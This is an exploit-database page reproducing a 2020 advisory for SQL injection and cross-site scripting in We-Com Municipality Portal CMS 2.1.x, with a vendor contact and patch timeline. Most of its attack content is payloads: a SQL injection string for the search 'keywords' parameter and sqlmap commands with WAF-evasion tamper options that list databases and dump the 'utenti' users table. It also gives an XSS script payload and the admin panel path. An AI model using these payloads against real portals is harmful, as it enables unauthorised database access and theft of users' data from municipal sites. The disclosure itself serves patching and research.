Advertisement






We-Com Municipality Portal CMS 2.1.x Cross Site Scripting / SQL Injection

CVE Category Price Severity
CWE-79 Not specified High
Author Risk Exploitation Type Date
Not provided High Remote 2020-06-02
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060011

Below is a copy:

We-Com Municipality Portal CMS 2.1.x Cross Site Scripting / SQL Injection
# Exploit Title: We-com Municipality portal CMS SQL Injection & XSS Vulnerability
# Google Dork:N/A
# Date: 2020-04-17
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www.we-com.it/
# Version: 2.1.x
# Tested on: 5.5.0-kali1-amd64

---------------------------------------------------------


Vendor contact timeline:


2020-05-05: Contacting vendor through  [email protected]
2020-05-26: A Patch is published in the versions
2020-06-01: Release of security advisory




PoC 1:
The attacker once locate the sql vulnerability in the "keywords" parameter of the portal search bar then the attacker  will be able to  perform an automated process to exploit the secruity  of Italien Municipality portal CMS 
Payload(s)

http://www.site.it/cerca/
POST Data: keywords='1'--

SQLMAP Payload(s):


sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs

sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D **_db --tables

sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D **_db -T utenti


PoC 2 :

XSS Vulnerability

Payload(s) :
http://www.site.com/cerca/ 
in the search bar:
'"<script>alert(1);</script>%



Admin panel:

www.site.it/admin/










Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum